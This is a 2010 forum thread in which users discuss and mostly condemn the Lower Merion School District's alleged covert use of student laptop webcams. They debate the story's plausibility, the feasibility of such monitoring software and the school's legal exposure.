School uses laptop webcams to spy on kids


Upchurch
18th February 2010, 10:42 AM
article (http://www.boingboing.net/2010/02/17/school-used-student.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+boingboing/iBag+(Boing+Boing))
According to the filings in Blake J Robbins v Lower Merion School District (PA) et al, the laptops issued to high-school students in the well-heeled Philly suburb have webcams that can be covertly activated by the schools' administrators, who have used this facility to spy on students and even their families. The issue came to light when the Robbins's child was disciplined for "improper behavior in his home" and the Vice Principal used a photo taken by the webcam as evidence.
A genuine WTF?!? moment.

I haven't read the attached PDF with all the legalese in it, but assuming the kid wasn't using the school laptop to surf porn or something (in which case, why need a picture?) I have to wonder what the hell the school was thinking. It would have saved time to just give the students millions of dollars rather than going through the hassle of a class action lawsuit.

Almo
18th February 2010, 10:47 AM
Yeah. WTF. Hard to believe! Weren't they worried about being brought up on privacy charges?!?

tyr_13
18th February 2010, 10:48 AM
Bloody hell. Really?

Ashles
18th February 2010, 10:49 AM
article (http://www.boingboing.net/2010/02/17/school-used-student.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+boingboing/iBag+(Boing+Boing))

A genuine WTF?!? moment.

I haven't read the attached PDF with all the legalese in it, but assuming the kid wasn't using the school laptop to surf porn or something (in which case, why need a picture?) I have to wonder what the hell the school was thinking. It would have saved time to just give the students millions of dollars rather than going through the hassle of a class action lawsuit.


Aside from the (I would have thought) utter impossibility of having any way of punishing kids for what they do at home... how did the school think for a second that secretly using technology to spy on people without their knowledge while in their own homes was not simply illegal?

Surely the school (or whichever idiot decided to do this and whichever other idiot decided to tell the kid off and thus reveal what they were up to) are now royally screwed?

This really is quite astonishing. Sometimes certain levels of stupidity almost take your breath away.

tyr_13
18th February 2010, 10:57 AM
If it were one person at the school, say the admin for the laptops, who made this sort of royal **** up, well, ok. I can see that happening. It would still be a display of stupidity of Great Pyramid of Giza monumental proportions. But to have the Vice Principal be handed this evidence means that she or he not only knew about it, but that their first reaction wasn't, "What the hell is wrong with you, undo this now and hope no one finds out."

Besides that, it means that they actually had a person or persons personally reviewing the webcams. This isn't like the security cameras at Wal-Mart, where no one is watching them until after there has been a problem and they burn it to DVD for the cops. This is recording people, students, children, in their own homes and watching it, which is horrendous enough on its own, but couple that with having no cause to suspect anything and it becomes the type of ******** that not even the 'I have nothing to hide so I'm not worried' crowd can defend.

Upchurch
18th February 2010, 11:01 AM
I haven't read the attached PDF with all the legalese in it, but assuming the kid wasn't using the school laptop to surf porn or something
okay, I've now read the PDF (as much as any mere mortal could) and didn't see any mention on why the school cracked down on the kid.

I would still like to know the school's side of the story, but even if they were fully justified in cracking down on the kid for improper use of school property, they stepped waaaaaaaay over the line by snapping a picture.

The only condition I can think to this that might redeem the school is if the kid were VPN'ed into the school network and (inappropriately) video chatting with someone in such a way that the stream went through the school. If that is the case, then the school is merely monitoring the traffic the kid sent to (and through) the school network.

Ashles
18th February 2010, 11:04 AM
I want to know what the "improper behavior in his home" actually was.

The more I think about this the more stupid it seems.

Someone watched this kid doing something at home via an illegal and secret camera and then decided to tell the kid off?

And they never considered that it might look a little bad on them?

I know I'm basically repeating myself now but... damn.

Uncayimmy
18th February 2010, 11:08 AM
Personally, I don't believe the story is accurate. In order for this to work, the computer would have to have some custom software on it. When the computer connected to the Internet, it would then have to connect to Central Computer (school office?) to say, "Here I am!" I'm not aware of any off-the-shelf software that does that.

If the school wanted to do something so clearly invasive and illegal, why wouldn't they tell people in advance? After all, the first time that they use the information, it's going to come into the open anyway. Even without using the info, there's no way such a system could stay hidden for very long. Are people not going to notice the camera working? The extra load on the CPU and network? Nobody is going to mention it ever?

The story we hear in the lawsuit probably only has a vague resemblance to the truth.

Ashles
18th February 2010, 11:17 AM
The story we hear in the lawsuit probably only has a vague resemblance to the truth.

You're probably right. I hope so.

It seems that the school used a photo on the laptop to demonstrate the kid was doing something improper. It could be that the kid took the photo himself and when the school got the laptop back they found the photo and took that further.
The remote connection may be a red herring. (Although all the stories seem to say quite clearly the laptops were capable of being remotely accessed in this way)

More likely the kid protested "I never took that photo of me doing that! It must be the school activating the laptop remotely."

Still, should be interesting.

tyr_13
18th February 2010, 11:18 AM
Personally, I don't believe the story is accurate. In order for this to work, the computer would have to have some custom software on it. When the computer connected to the Internet, it would then have to connect to Central Computer (school office?) to say, "Here I am!" I'm not aware of any off-the-shelf software that does that.


While I agree that the story might be inaccurate, off the shelf software does this all the time.

It's called Mac, or Windows, or hell even some Linux. It doesn't have to broadcast anything except when it is brought back to the school and acquires its 'home' network. Then it shares the files that it's told to always share with its home network and, lo and behold, some of those files are web cam recordings.

I'm sure one of the more patient tech guys here will be glad to spell out exactly how this is possible and the holes in my hasty explanation of it. However, I don't think that part of the story debunks the tale. I'm actually more surprised that no tech savvy students noticed it before.

Upchurch
18th February 2010, 11:19 AM
If the school wanted to do something so clearly invasive and illegal... {snip}

Are people not going to notice the camera working?

Never underestimate people's ability to be stupid, in both of the above cases.
That second point leads me to believe that the webcam was already on and the school was somehow viewing the stream.


That being said, the legal filing claims that the school had the ability to turn the camera on remotely. There is probably more information than we're getting.

ponderingturtle
18th February 2010, 11:23 AM
okay, I've now read the PDF (as much as any mere mortal could) and didn't see any mention on why the school cracked down on the kid.

I would still like to know the school's side of the story, but even if they were fully justified in cracking down on the kid for improper use of school property, they stepped waaaaaaaay over the line by snapping a picture.

I can kind of see an argument for it. This way you can't use the claim that it was someone else using the computer. Still if they are worried about this they can monitor how the computer is used and base it solely on that.

I could see this being standard if they had computers with webcams for student use. So if a computer is used for something inappropriate it will document who did it. If they then let the kid take it home without changing the software, it moves from totally legal to illegal.

INRM
18th February 2010, 11:28 AM
This is absolutely insane.

patchbunny
18th February 2010, 11:29 AM
Yeah. WTF. Hard to believe! Weren't they worried about being brought up on privacy charges?!?

I would think this falls under state law for wiretapping.

As others have stated, more information is needed.

drkitten
18th February 2010, 11:42 AM
I would think this falls under state law for wiretapping.


So do the lawyers.

They also think this falls under the 4th amendment.

I can't think of any legal theory under which this was a sensible idea.

JWideman
18th February 2010, 11:48 AM
Yes, it's possible. Usually when the school provides laptops like this, the laptops come pre-loaded with software and configured to allow remote access. However, there is also a user agreement informing the parents of this fact, and any monitoring is only during class. Turning on the web cam arbitrarily and peeping on the student would not be covered by such an agreement.

Uncayimmy
18th February 2010, 02:00 PM
While I agree that the story might be inaccurate, off the shelf software does this all the time.

It's called Mac, or Windows, or hell even some Linux. It doesn't have to broadcast anything except when it is brought back to the school and acquires its 'home' network. Then it shares the files that it's told to always share with its home network and, lo and behold, some of those files are web cam recordings.

I'm sure one of the more patient tech guys here will be glad to spell out exactly how this is possible and the holes in my hasty explanation of it. However, I don't think that part of the story debunks the tale. I'm actually more surprised that no tech savvy students noticed it before.

I challenge you or anyone else to produce examples of off-the-shelf software that allows a central computer to surreptitiously track and control webcams on multiple computers. I'm tech savvy, and I'm telling you that I have never seen any off-the-shelf software that does what is described in the filing. I could write such a program, but that means that the school would have to pay for custom software.

The significance of this is that such a software request would not be cheap, and it would become widely known in the school district. It's just one more piece of evidence that says this story is most likely ********:
* There's no good reason to do it.
* It's clearly against the law.
* Any practical or official use of the information would expose the whole shebang.
* It's expensive.
* Too many people would be involved for it to stay secret.
* It's easily detected by anybody with a modicum of computer expertise.
* Everybody involved would lose their jobs and be subject to civil lawsuits if not criminal prosecution.

On the other hand, we have the word of one student who claims that the school took a picture of him doing something inappropriate in his home. Right. They were just sitting there watching him stand right in front of his laptop. They saw him misbehave, so they saved a snapshot at Computer Central. Then they called the kid into the office and said, "We saw what you did on your own private time at home. Here's our evidence [shows pic]. You didn't actually break any school rules, and I am opening myself up to a civil lawsuit of epic proportions, but so what? I just wanted to let you know."

Anybody want to wager on how this story turns out?

Upchurch
18th February 2010, 02:04 PM
I challenge you or anyone else to produce examples of off-the-shelf software that allows a central computer to surreptitiously track and control webcams on multiple computers.

http://www.webcamxp.com/


eta: Wait, that might just be multiple video sources on the same computer. hold on.

eta2: yep, "remote administration (through web interface) (http://www.webcamxp.com/products.aspx)"

Uncayimmy
18th February 2010, 02:05 PM
Yes, it's possible. Usually when the school provides laptops like this, the laptops come pre-loaded with software and configured to allow remote access. However, there is also a user agreement informing the parents of this fact, and any monitoring is only during class. Turning on the web cam arbitrarily and peeping on the student would not be covered by such an agreement.

Remote access when connected to the school network, yes. Once you connect to some other network (home), the school doesn't know where the laptop is unless it "phones home" so to speak. Then it's subject to the firewall restrictions. Sure, you could use something like www.LogMeIn.com, but that's hardly surreptitious.

Uncayimmy
18th February 2010, 02:11 PM
http://www.webcamxp.com/

Surreptitious: obtained, done, made, etc., by stealth; secret or unauthorized; clandestine

I don't see that this software operates that way.

Upchurch
18th February 2010, 02:20 PM
Surreptitious: obtained, done, made, etc., by stealth; secret or unauthorized; clandestine

I don't see that this software operates that way.

You install and configure it before giving it to the kid. Assuming Windows, you add it to the Start Up folder and hide the icon in the tray. It starts up when you start Windows and gives no overt indication that it is running.

Easy.


(Granted, anyone with any experience with computers could find and remove it pretty easy, but this is just an example. I don't know what they used.)

Ziggurat
18th February 2010, 02:28 PM
I would think this falls under state law for wiretapping.

If their version of the story is true (and to be fair, we don't know yet that it is), then the school risked more than just wiretapping charges by allowing remote activation of a webcam, they risked child pornography charges (if, for example, a student got undressed while the camera was on).

Ziggurat
18th February 2010, 02:33 PM
Remote access when connected to the school network, yes. Once you connect to some other network (home), the school doesn't know where the laptop is unless it "phones home" so to speak.

That's pretty easy to accomplish. Hell, I doubt you even need commercial software to do that, you can probably accomplish it with a Visual Basic script.

Ducky
18th February 2010, 02:39 PM
That's pretty easy to accomplish. Hell, I doubt you even need commercial software to do that, you can probably accomplish it with a Visual Basic script.

4 lines of bash scripting could do it. I can't imagine it's a long VB script, or that it couldn't be added as a windows service.

Upchurch
18th February 2010, 02:45 PM
4 lines of bash scripting could do it. I can't imagine it's a long VB script, or that it couldn't be added as a windows service.
Especially if you have complete admin access to the computer before giving it to the kid. But that assumes a pretty tech savvy IT guy working at a high school. Not likely, in my experience, but YMMV.

Uncayimmy
18th February 2010, 02:57 PM
You install and configure it before giving it to the kid. Assuming Windows, you add it to the Start Up folder and hide the icon in the tray. It starts up when you start Windows and gives no overt indication that it is running.

Easy.


(Granted, anyone with any experience with computers could find and remove it pretty easy, but this is just an example. I don't know what they used.)

It's not surreptitious if anybody can easily find it and remove the software. The lawsuit talks about this stuff being covert. If it's a commercially available app that can be seen by anyone, the students would have sniffed it out the first week. It wouldn't sit around undetected for months until some administrator reveals the Big Secret by showing a kid a picture from his home. Interestingly, this picture was actually on the kid's laptop, not Computer Central.

There are other things in the lawsuit that I assume are the result of the lawyer not understanding technology. It says that the "webcam can be activated remotely at any time" by the school district. Well, short of radio transmitters in the laptop, this ain't gonna happen. The machine at least needs to be on and connected to the Internet. It says that the school district has the "ability to capture webcam images from any location where the laptop is kept." Again, untrue short of some CIA-type electronics.

If I wanted to be pedantic, I would point to all these things as further evidence that such software is not commercially available. But I'm not. I'm actually giving them the benefit of the doubt, but I'm only willing to bend so far.

My guess is that the laptops probably have remote administration software enabled, and this lawsuit is based on ignorance.

Uncayimmy
18th February 2010, 02:59 PM
That's pretty easy to accomplish. Hell, I doubt you even need commercial software to do that, you can probably accomplish it with a Visual Basic script.

I never said it was hard. I said it was hardly surreptitious.

applecorped
18th February 2010, 03:03 PM
Your guess is the lawsuit is based on ignorance? Fascinating.

Upchurch
18th February 2010, 03:09 PM
My guess is that the laptops probably have remote administration software enabled, and this lawsuit is based on ignorance.
Wait, how is that not just as bad, if they are using that access to take pictures of kids at home without their knowledge?

The lawsuit doesn't specify how the school did it, only what it did.

Ziggurat
18th February 2010, 03:18 PM
I never said it was hard. I said it was hardly surreptitious.

It's not surreptitious like a root kit is, but if you don't look for it, most people would never find it or even know about it. Windows has tons of processes running in the background, and most users have no clue what most of them do, and no interest in finding out. So if you don't tell them it's there, yeah, that's effectively surreptitious.

shadron
18th February 2010, 03:29 PM
If they can turn the camera on then they can do the microphone, too. Keylogger? Maybe take your pulse through the touchpad? Beeg Brother.

I imagine the band-aid consumption in the community spiked overnight.

I would also note, UY, that many large school districts have IT staffs that are more than up to providing a script to do this, and embedding it pretty deep in some other innocuous app if they want to. I just can't imagine any IT department head OKing this, or not making a stink to the board and/or superintendent. The laws violated by this, let alone common sense and expectations from one's public school structure are just mind boggling. See paragraph 1, posting #5 above.

Uncayimmy
18th February 2010, 03:33 PM
It's not surreptitious like a root kit is, but if you don't look for it, most people would never find it or even know about it. Windows has tons of processes running in the background, and most users have no clue what most of them do, and no interest in finding out. So if you don't tell them it's there, yeah, that's effectively surreptitious.

I already posted the definition. Clandestine is one of the descriptors, which requires concealment. I know people here in SI&CE love to get all pedantic, so I'm not going to continue to play your stupid little game of breaking apart quotes into small chunks, then re-adjusting the argument when the omitted parts are brought back into the picture.

Read the frigging lawsuit. It talks about how clandestine and powerful this "spying" software is. I'm saying that nothing like this exists commercially, so that makes it even less likely that what they claim actually exists. In rebuttal I'm having people tell me, "Well, there's some software that does some of what is claimed. It's installed just like ordinary software, so anybody can see it."

Sure. Out of thousands of high school students, not one went sniffing around to see what was running. Nobody actually saw the webcam coming to life and sending images back to Computer Central. Nobody noticed the CPU or bandwidth drag. Nobody noticed the disk chugging or the webcam light coming on. The software never crashed or caused any problems. There was never a firewall issue or anything like that. It was just hidden right out in the open and nobody noticed it!

Ziggurat
18th February 2010, 03:46 PM
I know people here in SI&CE love to get all pedantic, so I'm not going to continue to play your stupid little game of breaking apart quotes into small chunks, then re-adjusting the argument when the omitted parts are brought back into the picture.

Easy there, fella.

Read the frigging lawsuit. It talks about how clandestine and powerful this "spying" software is. I'm saying that nothing like this exists commercially, so that makes it even less likely that what they claim actually exists.

The lawsuit is almost certainly wrong on those counts. But that's not what people are interested in. What people are interested in is whether or not the school was able to remotely activate the webcam without the knowledge or consent of the student. You're right, the lawsuit claims more than that, but that alone would be enough to be a HUGE friggin' problem. And while I would hope that common sense would prevent a school from doing that, it's technically trivial to do. Can you understand why that could cause concern?

It is a DIFFERENT question as to whether or not that happened, and I don't think anyone here is claiming that we can simply assume that it did based on the complaint.

Ducky
18th February 2010, 04:09 PM
Especially if you have complete admin access to the computer before giving it to the kid. But that assumes a pretty tech savvy IT guy working at a high school. Not likely, in my experience, but YMMV.

What's more likely is the computer admin/teacher having a kid set it up, or using a kid's project.

Adaptation of the "security" programs that snap a shot and phone home (for macs, there's iAlertU, for windows there are similar) is trivial.

Uncayimmy
18th February 2010, 05:36 PM
The lawsuit is almost certainly wrong on those counts. But that's not what people are interested in. What people are interested in is whether or not the school was able to remotely activate the webcam without the knowledge or consent of the student. You're right, the lawsuit claims more than that, but that alone would be enough to be a HUGE friggin' problem. And while I would hope that common sense would prevent a school from doing that, it's technically trivial to do. Can you understand why that could cause concern?
I already pointed out that if they have any remote control software installed, they could take over the machine and do whatever they wanted to, and that includes running the webcam. Would it concern me if a school district, which simply loaned computers to students, had that kind of software installed? No, not really. There's always a measure of trust in these situations. Do they check the gym teachers for spa cams every day? No, but those teachers could certainly abuse their access.

It is a DIFFERENT question as to whether or not that happened, and I don't think anyone here is claiming that we can simply assume that it did based on the complaint.
You must be reading a different thread than I am because it seems some people are accepting the claim at face value.

casebro
18th February 2010, 05:50 PM
So if the kid lived close to the school, and used the school's wireless connection...

RenaissanceBiker
19th February 2010, 05:53 AM
I put a small piece of tape over that little feature on the digital device supplied to me by the organization that regularly deposits funds in my account in exchange for professional services.

/not paranoid

WildCat
19th February 2010, 06:28 AM
Well, short of radio transmitters in the laptop, this ain't gonna happen.
Er, isn't that sort of the whole point of the laptop - portability and wireless internet access?

casebro
19th February 2010, 08:09 AM
Hmm, suppose a laptop supplied by someone else were to be set up to use the net to only connect to the server of the supplier's choice?

Laptop -> net -> school -> net. User would think they are free to surf all they want, yet the school could run the user's system. Laptop as a -what do they call them? minimal computing power, few apps installed, station? portal? Ya know, not a full computer, uses the net to communicate with the main PC? anybody?????

GreNME
19th February 2010, 08:55 AM
4 lines of bash scripting could do it. I can't imagine it's a long VB script, or that it couldn't be added as a windows service.

The concept would be the same on a Windows machine as it would be in a bash script. There would probably be a few more lines of code than in bash, though, because bash is sort of built for quicker and easier access for things like that (provided there's system drivers). I would imagine that on a Windows computer it wouldn't be much different than what Consumerist.com did to catch Geek Squad (http://www.consumerist.com/2007/07/video-consumerist-catches-geek-squad-stealing-porn-from-customers-computer.html), though instead of using a program to catch screenshots one would use WMI calls to access the camera.

In other words, not difficult at all using the script host and WMI access to the system.

drkitten
19th February 2010, 09:17 AM
Read the frigging lawsuit. It talks about how clandestine and powerful this "spying" software is. I'm saying that nothing like this exists commercially, so that makes it even less likely that what they claim actually exists. In rebuttal I'm having people tell me, "Well, there's some software that does some of what is claimed. It's installed just like ordinary software, so anybody can see it."

The only problem is that the school has already admitted that such software has been installed on the laptops they pass out, as a "security" measure. The idea is that it will help them track down stolen, lost, or missing computers.

From the AP Newswire:


The school district says it has deactivated a security feature intended to track lost or stolen laptops.

The district says the tracking feature would not be reactivated without "written notification to all students and families."

Also:


A suburban Philadelphia school district accused of spying on students at home via school-issued computers told parents it only activated the webcams to find missing laptops.

The schools' technology and security departments would activate the webcam when any of the 2,300 student laptops were reported lost or stolen, Lower Merion School District Superintendent Christopher McGinley said.

... which makes claims of technical impossibility rather difficult to defend.

And, of course, if the student was actually shown a picture taken from his web cam (as alleged in the lawsuit), then that makes McGinley's statement that they were only turned on to find missing laptops a lie, since Robbins' laptop had not been lost or stolen.

I Ratant
19th February 2010, 10:06 AM
If the child performs the action -at school-, then the school might have a sayso.
What goes on off the school property, ain't none of their damn business!

WildCat
19th February 2010, 10:16 AM
If the child performs the action -at school-, then the school might have a sayso.
What goes on off the school property, ain't none of their damn business!
What if a student is convicted of a violent crime? Is that none of the school's business?

Beerina
19th February 2010, 10:18 AM
It's not surreptitious like a root kit is, but if you don't look for it, most people would never find it or even know about it. Windows has tons of processes running in the background, and most users have no clue what most of them do, and no interest in finding out. So if you don't tell them it's there, yeah, that's effectively surreptitious.

In any case, from a propriety standpoint, you don't have to look for government spying on you in private for you to stop them. They're simply forbidden from doing it in the first place.

I Ratant
19th February 2010, 10:41 AM
What if a student is convicted of a violent crime? Is that none of the school's business?
.
"convicted of a violent crime".. then the school has an obligation to continue the student's education during the jail time.

WildCat
19th February 2010, 11:20 AM
.
"convicted of a violent crime".. then the school has an obligation to continue the student's education during the jail time.
What if there's no jail time, just probation?

Does the school not have a legitimate interest in knowing a violent offender is in their midst? Maybe even a sexual predator?

The Fallen Serpent
19th February 2010, 11:28 AM
What if there's no jail time, just probation?

Does the school not have a legitimate interest in knowing a violent offender is in their midst? Maybe even a sexual predator?

There are laws concerning sexual offenders that often result in schools being notified. Notification of violent offenses is more spotty and really depends on the severity of crime. In high school we found out there was a murderer who attended our school. Most of the teachers did not know who the individual was and it became a game of speculation and rumor. As it was explained to me, telling everyone who it was would have been a violation of privacy laws even though if someone had the initiative to just take a list of all students and look up public records it could be found and not at all a violation of privacy laws. Hint hint. I never heard of anyone ever doing so, it was more fun to speculate and suspect which kids might be the murderer. Largely though, schools are limited and unable to punish the students for most illegal activity occurring outside the bounds of the school's jurisdiction so to speak. There might be special clubs that only allow those who are law abiding, refrain from certain activities and such, but even so such clubs or honors do not give the school powers to circumvent privacy laws and spy on homes.

I Ratant
19th February 2010, 11:31 AM
What if there's no jail time, just probation?

Does the school not have a legitimate interest in knowing a violent offender is in their midst? Maybe even a sexual predator?
.
These situations are obtainable by spying on the kid's family life?
Does not the court have some responsibility here?
There might be clues as to why the kid is a criminal in such surveillance, but the surveillance itself as discussed here is illegal.

ponderingturtle
19th February 2010, 11:34 AM
If the child performs the action -at school-, then the school might have a sayso.
What goes on off the school property, ain't none of their damn business!

He was using school property.

WildCat
19th February 2010, 11:42 AM
.
These situations are obtainable by spying on the kid's family life?
Did I say that? I was just pointing out that there are circumstances where a school should know about some off-school occurrences.

There might be clues as to why the kid is a criminal in such surveillance, but the surveillance itself as discussed here is illegal.
I agree.

Ladewig
19th February 2010, 11:57 AM
Nobody noticed the disk chugging or the webcam light coming on.

I cannot comment on the rest of your post, but this issue seems to be addressed in a Pennsylvania news article: http://www.philly.com/philly/news/nation_world/20100219_Remotely_accessing_a_laptop_is_fairly_easy.html

There was even said to be an ideal cover story that got students to disregard a key warning.

Although a tiny green diode lights up when the MacBook's iSight camera, mounted just above the screen, is recording, school administrators allegedly warned about a bug - well-documented online by other MacBook users - that made the light come on randomly.

"Based on the number of times the green lights have randomly triggered," Lower Merion student Brian Sperling posted on the technology Web site Gizmodo yesterday, "I can't imagine that we're being watched (they'd need a task force) but some of the time [it] could have been them."

I Ratant
19th February 2010, 12:04 PM
He was using school property.
.
Yeah...
Surreptitiously altered and used to observe activities not connected to the school.
it's not like he was taking a basketball home to shoot some hoops in the parking lot at home.

Safe-Keeper
19th February 2010, 12:11 PM
I've never understood why if god wanted everyone dead save Noah and his family, why didn't they just drop dead? Flooding seems awfully inefficient. It's my experience that if a news story sounds too outrageous to be true, it usually is.

Ziggurat
19th February 2010, 12:13 PM
.
"convicted of a violent crime".. then the school has an obligation to continue the student's education during the jail time.

No. The state has an obligation to do so. The school does not.

I Ratant
19th February 2010, 12:18 PM
Zing!
Did you duck?

Ziggurat
19th February 2010, 12:20 PM
The only problem is that the school has already admitted that such software has been installed on the laptops they pass out, as a "security" measure.

Not exactly. Unca is right that the lawsuit describes software with capabilities that simply don't exist, and go far beyond what the actual software installed could have done. The problem is that the software doesn't need to have the capabilities described in the initial lawsuit in order to pose serious privacy problems, and software which can violate student privacy in unacceptable ways does exist and is trivial to set up. It sounds like this software may have been capable of that, but the devil is in the details, not just in terms of capability but also in terms of configuration.

I Ratant
19th February 2010, 01:55 PM
If the child were sexting say, using the WiFi capabilities at home, and dumb enough to not remove the fact when taking the laptop to school, and the school then found the stuff, not in real time as is presumed, but after at the school when viewing what was on the computer, then the school isn't overtly spying, but there is a problem with their handling of the situation, it appears.

Uncayimmy
19th February 2010, 02:43 PM
Here's the letter from the school district to the parents:
http://www.lmsd.org/sections/news/default.php?m=0&t=today&p=lmsd_anno&id=1138

Am I the only one who is annoyed that more details were not given? When they say it was activated to take a still picture of the operator and screen, I assume they mean "while connected to the Internet the laptop can be commanded to send those images back to Computer Central along with the IP address of the laptop. Together this information should often be sufficient for the police to locate and retrieve the laptop."

I would also like to think that there would be procedures in place for activating this feature. Access to it should have been severely restricted and each use should have been logged automatically for cross-referencing to the records for requests to activate the feature. It disturbs me that nothing like this was mentioned.

I'm also wondering at this point if the kid in question was actually in possession of a stolen laptop. From a practical standpoint, I can't see an administrator repeatedly triggering this feature, looking at the pictures, and then concluding the kid was misbehaving at home and then disciplining him at school for it. I mean, that's insane. Possible, yes, but frigging insane.

commandlinegamer
19th February 2010, 03:16 PM
What behaviour, other than him causing damage to the laptop, could they possibly have grounds to discipline over?

casebro
19th February 2010, 04:14 PM
Hmm, a glob of some kind of goop ought to blur the camera without making it look like the user taped it over. Lip balm? Might not even be noticed by the teacher at school?

casebro
20th February 2010, 06:57 AM
This morning's news is that the FBI is investigating.

Apparently, the kid was eating "Mike & Ike" candies, looked like pills on camera. The school is inferring that the laptop was reported stolen?

http://www.foxnews.com/story/0,2933,587034,00.html?test=latestnews

tyr_13
20th February 2010, 07:10 AM
I didn't think it could get more stupid.

ponderingturtle
20th February 2010, 07:24 AM
.
Yeah...
Surreptitiously altered and used to observe activities not connected to the school.
it's not like he was taking a basketball home to shoot some hoops in the parking lot at home.

Depends on what activities it was being used to cover. What restrictions does the school have on the use of their laptops?

Cleon
20th February 2010, 07:30 AM
This morning's news is that the FBI is investigating.

Apparently, the kid was eating "Mike & Ike" candies, looked like pills on camera. The school is inferring that the laptop was reported stolen?

http://www.foxnews.com/story/0,2933,587034,00.html?test=latestnews

Wow. It's like an onion - you pull off one layer of stupid, and there's another fresh layer of stupid right under it.

I Ratant
20th February 2010, 09:00 AM
I didn't think it could get more stupid.
.
Have faith, Grasshopper.
There's no lower limit to stupidity.
It HAS to get more stupid, these things always do! :(

WildCat
20th February 2010, 09:09 AM
I hope the computers of those who had the ability to turn on the web cam are searched thoroughly.

Lots of child porn potential in this.

JWideman
20th February 2010, 09:22 AM
I hope the computers of those who had the ability to turn on the web cam are searched thoroughly.

Lots of child porn potential in this.

The FBI is investigating, which means that if even one kid was naked or whatever when they turned the camera on, the image will be found and there will be charges.

SonOfLaertes
20th February 2010, 09:47 AM
Wow. It's like an onion - you pull off one layer of stupid, and there's another fresh layer of stupid right under it.

I live in the area, and a cousin who has kids in the school district tells me that this may be a case of an exceedingly over-zealous vice-principal abusing a system designed to recover lost/stolen laptops. This is only second-hand word of mouth, mind you.

This nitwit was apparently so anxious to get the drop on this kid that he didn't think through the wider ramifications of his actions. He lusted for the moment when he confronted the kid with the "evidence", kind of like Wile E. Coyote finally getting the drop on the Road Runner.

This is a school district with a terrific reputation, so the series of moronic decisions in this case lead me to believe that this individual, or a few individuals, manipulated the staff just long enough to spy on kids that they have been trying to "bring down" with no prior success.

Eventually someone else in authority with a modicum of sense would have realized what was going on and put the brakes on hard; but before reasonable people had a chance this vice-principal took the first tiny shred of "evidence" gathered and had his little moment of glory; a moment which will undoubtedly get him fired, blacklisted, and possibly jailed. The sad thing is a good school system, with good intentions, will suffer all the more.

rwguinn
20th February 2010, 09:55 AM
...

This is a school district with a terrific reputation,...
is that Terrific as in "Causes terror", or the more usual version?
(JAQ)

Upchurch
20th February 2010, 10:06 AM
I live in the area, and a cousin who has kids in the school district tells me that this may be a case of an exceedingly over-zealous vice-principal abusing a system designed to recover lost/stolen laptops. This is only second-hand word of mouth, mind you.

This nitwit was apparently so anxious to get the drop on this kid that he didn't think through the wider ramifications of his actions. He lusted for the moment when he confronted the kid with the "evidence", kind of like Wile E. Coyote finally getting the drop on the Road Runner.

That sounds plausible to me. I've known elementary school teachers who over time behave more and more like children. It would not surprise me to find that this official fell into a similar trap.

Still, as you say, this is a third-hand anecdote.

Thunder
20th February 2010, 10:21 AM
only privately owned computers should have the ability to have their cameras remotely turned on. tax-payer funded institutions should not. they should let the police make such a call in cases of theft.

casebro
20th February 2010, 10:35 AM
Hmmm, I wonder how many other schools use the same system? I doubt it was dreamt up by the one vice principal, it must be an optional anti-theft program sold to schools. And to ????

SonOfLaertes
20th February 2010, 10:40 AM
is that Terrific as in "Causes terror", or the more usual version?
(JAQ)

Terrific as in being the school system which produced Kobe Bryant ... :D

Lower Merion is a very wealthy school district, many of its students come from the "Main Line" (watch the movie "The Philadelphia Story" to get a sense of the Main Line). Many of its students go on to attend Ivy League colleges. So I guess my point is that this is a school district with a lot of money; I'm quite sure that their IT and administrative staff is top-notch, the best money can buy. Ordinarily one would expect staff like this to cover all the bases and be on top of its systems and programs. Which is why I tend to believe that someone intentionally manipulated the situation for their own reasons.

As to earlier assertions that it was unlikely that the software or monitoring system was sophisticated, think again. This school system has the money and resources of a small corporation.

Uncayimmy
20th February 2010, 01:35 PM
It's still not fitting together for me. Apparently the school official cited as evidence a photograph "embedded" in the school-issued laptop. How does that mesh with the notion of Computer Central requesting the laptop send an image? The whole story just doesn't make sense to me yet.

quadraginta
20th February 2010, 03:10 PM
I live in the area, and a cousin who has kids in the school district tells me that this may be a case of an exceedingly over-zealous vice-principal abusing a system designed to recover lost/stolen laptops. This is only second-hand word of mouth, mind you.

This nitwit was apparently so anxious to get the drop on this kid that he didn't think through the wider ramifications of his actions. He lusted for the moment when he confronted the kid with the "evidence", kind of like Wile E. Coyote finally getting the drop on the Road Runner.

This is a school district with a terrific reputation, so the series of moronic decisions in this case lead me to believe that this individual, or a few individuals, manipulated the staff just long enough to spy on kids that they have been trying to "bring down" with no prior success.

Eventually someone else in authority with a modicum of sense would have realized what was going on and put the brakes on hard; but before reasonable people had a chance this vice-principal took the first tiny shred of "evidence" gathered and had his little moment of glory; a moment which will undoubtedly get him fired, blacklisted, and possibly jailed. The sad thing is a good school system, with good intentions, will suffer all the more.


I don't think it matters if everyone in the entire district save one are pure as driven snow and candidates for canonization. All this demonstrates is the truth of the old wisdom that if power can be abused then someone will abuse it.

If there was software installed on those computers which worked even approximately in the fashion that is being claimed then its mere presence is the transgression, not whether it is employed with discretion. There is going to be more than one assistant principal involved in making a policy decision of that sort.

Anyone involved in signing off on the installation of such software needs to be busted down to food service ... for farm animals.

After they get out of prison.

Sledge
20th February 2010, 03:25 PM
This nitwit was apparently so anxious to get the drop on this kid that he didn't think through the wider ramifications of his actions. He lusted for the moment when he confronted the kid with the "evidence", kind of like Wile E. Coyote finally getting the drop on the Road Runner.
The kid's name isn't Ferris, is it?

Ducky
20th February 2010, 06:15 PM
I already posted the definition. Clandestine is one of the descriptors, which requires concealment. I know people here in SI&CE love to get all pedantic, so I'm not going to continue to play your stupid little game of breaking apart quotes into small chunks, then re-adjusting the argument when the omitted parts are brought back into the picture.

Read the frigging lawsuit. It talks about how clandestine and powerful this "spying" software is. I'm saying that nothing like this exists commercially, so that makes it even less likely that what they claim actually exists. In rebuttal I'm having people tell me, "Well, there's some software that does some of what is claimed. It's installed just like ordinary software, so anybody can see it."

Sure. Out of thousands of high school students, not one went sniffing around to see what was running. Nobody actually saw the webcam coming to life and sending images back to Computer Central. Nobody noticed the CPU or bandwidth drag. Nobody noticed the disk chugging or the webcam light coming on. The software never crashed or caused any problems. There was never a firewall issue or anything like. It was just hidden right out in the open and nobody noticed it!



According to this:

http://www.washingtonpost.com/wp-dyn/content/article/2010/02/20/AR2010022000679.html

The laptops are apples.

Per above article:

Lower Merion, an affluent district in Philadelphia's suburbs, issues Apple laptops to all 2,300 students at its two high schools.

Which means it's not even a matter of sophistication or monetary/skilled resources to have software that can snap a pic and phone home.

